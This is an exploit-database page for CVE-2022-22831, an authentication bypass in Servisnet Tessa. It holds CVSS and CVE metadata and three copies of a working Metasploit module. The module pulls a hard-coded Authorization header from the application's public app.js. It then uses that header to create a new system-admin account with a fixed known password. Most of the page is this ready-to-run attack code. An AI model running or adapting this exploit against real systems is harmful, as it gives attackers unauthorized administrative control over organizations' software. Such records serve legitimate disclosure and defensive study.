Servisnet Tessa - Add sysAdmin User (Unauthenticated) Exploit

2022-02-05T00:00:00

Description

{"id": "1337DAY-ID-37312", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Servisnet Tessa - Add sysAdmin User (Unauthenticated) Exploit", "description": "", "published": "2022-02-05T00:00:00", "modified": "2022-02-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/37312", "reporter": "AkkuS", "references": [], "cvelist": ["CVE-2022-22831"], "immutableFields": [], "lastseen": "2022-06-07T20:10:56", "viewCount": 189, "enchantments": {"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2022-22831"]}, {"type": "exploitdb", "idList": ["EDB-ID:50714"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165863"]}]}, "score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-22831"]}, {"type": "exploitdb", "idList": ["EDB-ID:50714"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165863"]}]}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1659947321, "score": 1659950154}, "_internal": {"score_hash": "f1d81a8100d285de2ab21dc218fabc72"}, "sourceHref": "https://0day.today/exploit/37312", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',\n 'Description' => %q(\n This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.\n\t\tThe app.js is publicly available which acts as the backend of the application.\n By exposing a default value for the \"Authorization\" HTTP header, \n it is possible to make unauthenticated requests to some areas of the application. \n Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.\n A new admin user can be added to the database with this header obtained in the source code.\t\t\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22831' ],\n [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n '\u00d6zkan Mustafa AKKU\u015e <AkkuS>' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split) \n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end \n # for Origin and Referer headers\n\n def app_path\n res = send_request_cgi({\n # default.a.get( check \n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n }) \t\n\t\n if res && res.code == 200 && res.body =~ /baseURL/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n base_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0]\n print_status(\"baseURL: #{base_url}\") \n return base_url\n else\n fail_with(Failure::NotVulnerable, 'baseURL not found!')\n end\n end\n\n def add_user\n token = auth_bypass\n newuser = Rex::Text.rand_text_alpha_lower(8)\t\n id = Rex::Text.rand_text_numeric(4) \n # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111\n json_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, \"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullan\u0131c\u0131\"}'\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'ctype' => 'application/json',\n 'uri' => normalize_uri(target_uri.path, app_path, 'users'),\n 'headers' =>\n {\n 'Authorization' => token\n },\n 'data' => json_data\n })\n\n if res && res.code == 200 && res.body =~ /localhost/\n print_good(\"The sysAdmin authorized user has been successfully added.\")\n print_status(\"Username: #{newuser}\")\n print_status(\"Password: 1111111111\")\n else\n fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')\n end\n end\n\n def auth_bypass\n\n res = send_request_cgi({\n # default.a.defaults.headers.post[\"Authorization\"] check \n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n }) \t\n\t\n if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/\n\t token = split(res.body, 'Authorization')\n\t print_status(\"Authorization: #{token}\") \n return token\n\telse\n\t fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n\tend\n\n end\n\n def check \t\n\t\n if auth_bypass =~ /Basic/ \n return Exploit::CheckCode::Vulnerable\n else\n return Exploit::CheckCode::Safe\n end\n end\n \n def run\n unless Exploit::CheckCode::Vulnerable == check\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n add_user \n end\nend\n", "category": "web applications", "verified": true}

{"packetstorm": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {}, "published": "2022-02-04T00:00:00", "type": "packetstorm", "title": "Servisnet Tessa Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22831"], "modified": "2022-02-04T00:00:00", "id": "PACKETSTORM:165863", "href": "https://packetstormsecurity.com/files/165863/Servisnet-Tessa-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)', \n'Description' => %q( \nThis module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user. \nThe app.js is publicly available which acts as the backend of the application. \nBy exposing a default value for the \"Authorization\" HTTP header, \nit is possible to make unauthenticated requests to some areas of the application. \nEven MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method. \nA new admin user can be added to the database with this header obtained in the source code. \n \n), \n'References' => \n[ \n[ 'CVE', 'CVE-2022-22831' ], \n[ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ], \n[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ] \n], \n'Author' => \n[ \n'\u00d6zkan Mustafa AKKU\u015e <AkkuS>' # Discovery & PoC & MSF Module @ehakkus \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => \"Dec 22 2021\", \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path for application', '/']) \n]) \nend \n# split strings to salt \ndef split(data, string_to_split) \nword = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/) \nstring = word.split('\"]').join('').split('[\"').join('') \nreturn string \nend \n# for Origin and Referer headers \n \ndef app_path \nres = send_request_cgi({ \n# default.a.get( check \n'uri' => normalize_uri(target_uri.path, 'js', 'app.js'), \n'method' => 'GET' \n}) \n \nif res && res.code == 200 && res.body =~ /baseURL/ \ndata = res.body \n#word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/) \nbase_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0] \nprint_status(\"baseURL: #{base_url}\") \nreturn base_url \nelse \nfail_with(Failure::NotVulnerable, 'baseURL not found!') \nend \nend \n \ndef add_user \ntoken = auth_bypass \nnewuser = Rex::Text.rand_text_alpha_lower(8) \nid = Rex::Text.rand_text_numeric(4) \n# encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111 \njson_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, \"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullan\u0131c\u0131\"}' \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'ctype' => 'application/json', \n'uri' => normalize_uri(target_uri.path, app_path, 'users'), \n'headers' => \n{ \n'Authorization' => token \n}, \n'data' => json_data \n}) \n \nif res && res.code == 200 && res.body =~ /localhost/ \nprint_good(\"The sysAdmin authorized user has been successfully added.\") \nprint_status(\"Username: #{newuser}\") \nprint_status(\"Password: 1111111111\") \nelse \nfail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.') \nend \nend \n \ndef auth_bypass \n \nres = send_request_cgi({ \n# default.a.defaults.headers.post[\"Authorization\"] check \n'uri' => normalize_uri(target_uri.path, 'js', 'app.js'), \n'method' => 'GET' \n}) \n \nif res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/ \ntoken = split(res.body, 'Authorization') \nprint_status(\"Authorization: #{token}\") \nreturn token \nelse \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \n \nend \n \ndef check \n \nif auth_bypass =~ /Basic/ \nreturn Exploit::CheckCode::Vulnerable \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef run \nunless Exploit::CheckCode::Vulnerable == check \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \nadd_user \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165863/servisnettessa-adduser.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T10:01:25", "description": "An issue was discovered in Servisnet Tessa 0.0.2. An attacker can add a new sysadmin user via a manipulation of the Authorization HTTP header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-06T21:15:00", "type": "cve", "title": "CVE-2022-22831", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22831"], "modified": "2022-02-11T04:13:00", "cpe": ["cpe:/a:servisnet:tessa:0.0.2"], "id": "CVE-2022-22831", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22831", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:servisnet:tessa:0.0.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-12T02:06:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-04T00:00:00", "type": "exploitdb", "title": "Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-22831", "CVE-2022-22831"], "modified": "2022-02-04T00:00:00", "id": "EDB-ID:50714", "href": "https://www.exploit-db.com/exploits/50714", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',\r\n 'Description' => %q(\r\n This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.\r\n\t\tThe app.js is publicly available which acts as the backend of the application.\r\n By exposing a default value for the \"Authorization\" HTTP header, \r\n it is possible to make unauthenticated requests to some areas of the application. \r\n Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.\r\n A new admin user can be added to the database with this header obtained in the source code.\t\t\r\n\r\n ),\r\n 'References' =>\r\n [\r\n [ 'CVE', 'CVE-2022-22831' ],\r\n [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],\r\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\r\n ],\r\n 'Author' =>\r\n [\r\n '\u00d6zkan Mustafa AKKU\u015e <AkkuS>' # Discovery & PoC & MSF Module @ehakkus\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => \"Dec 22 2021\",\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\r\n ])\r\n end\r\n # split strings to salt\r\n def split(data, string_to_split) \r\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\r\n string = word.split('\"]').join('').split('[\"').join('')\r\n return string\r\n end \r\n # for Origin and Referer headers\r\n\r\n def app_path\r\n res = send_request_cgi({\r\n # default.a.get( check \r\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\r\n\t 'method' => 'GET'\r\n }) \t\r\n\t\r\n if res && res.code == 200 && res.body =~ /baseURL/\r\n data = res.body\r\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\r\n base_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0]\r\n print_status(\"baseURL: #{base_url}\") \r\n return base_url\r\n else\r\n fail_with(Failure::NotVulnerable, 'baseURL not found!')\r\n end\r\n end\r\n\r\n def add_user\r\n token = auth_bypass\r\n newuser = Rex::Text.rand_text_alpha_lower(8)\t\r\n id = Rex::Text.rand_text_numeric(4) \r\n # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111\r\n json_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, \"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullan\u0131c\u0131\"}'\r\n\r\n res = send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'ctype' => 'application/json',\r\n 'uri' => normalize_uri(target_uri.path, app_path, 'users'),\r\n 'headers' =>\r\n {\r\n 'Authorization' => token\r\n },\r\n 'data' => json_data\r\n })\r\n\r\n if res && res.code == 200 && res.body =~ /localhost/\r\n print_good(\"The sysAdmin authorized user has been successfully added.\")\r\n print_status(\"Username: #{newuser}\")\r\n print_status(\"Password: 1111111111\")\r\n else\r\n fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')\r\n end\r\n end\r\n\r\n def auth_bypass\r\n\r\n res = send_request_cgi({\r\n # default.a.defaults.headers.post[\"Authorization\"] check \r\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\r\n\t 'method' => 'GET'\r\n }) \t\r\n\t\r\n if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/\r\n\t token = split(res.body, 'Authorization')\r\n\t print_status(\"Authorization: #{token}\") \r\n return token\r\n\telse\r\n\t fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\r\n\tend\r\n\r\n end\r\n\r\n def check \t\r\n\t\r\n if auth_bypass =~ /Basic/ \r\n return Exploit::CheckCode::Vulnerable\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def run\r\n unless Exploit::CheckCode::Vulnerable == check\r\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\r\n end\r\n add_user \r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/50714", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Servisnet Tessa - Add sysAdmin User (Unauthenticated) Exploit

Description

Related